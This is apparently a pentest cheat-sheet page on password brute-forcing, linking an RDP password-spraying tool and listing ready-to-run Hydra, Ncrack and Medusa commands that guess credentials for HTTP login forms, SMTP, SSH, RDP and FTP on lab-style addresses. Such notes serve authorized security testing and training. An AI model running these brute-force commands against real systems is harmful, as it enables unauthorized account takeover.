# Bruteforce

## By Protocol

### RDP

#### RDPassSpray

Link: <https://github.com/xFreed0m/RDPassSpray>

## By Tools

### Hydra&#x20;

`hydra 10.0.0.1 http-post-form “/admin.php:target=auth&mode=login&user=^USER^&password=^PASS^:invalid” -P /usr/share/wordlists/rockyou.txt -l admin`&#x20;

**SMTP**:

`hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp –V`&#x20;

**SSH user with password list**&#x20;

`hydra -l user -P pass.txt -t 10 10.10.10.10 ssh -s 22`&#x20;

### Ncrack&#x20;

RDP user with password list&#x20;

`ncrack -vv --user offsec -P passwords rdp://10.10.10.10`&#x20;

### Medusa&#x20;

FTP user with password list&#x20;

`medusa -h 10.10.10.10 -u user -P passwords.txt -M ftp`&#x20;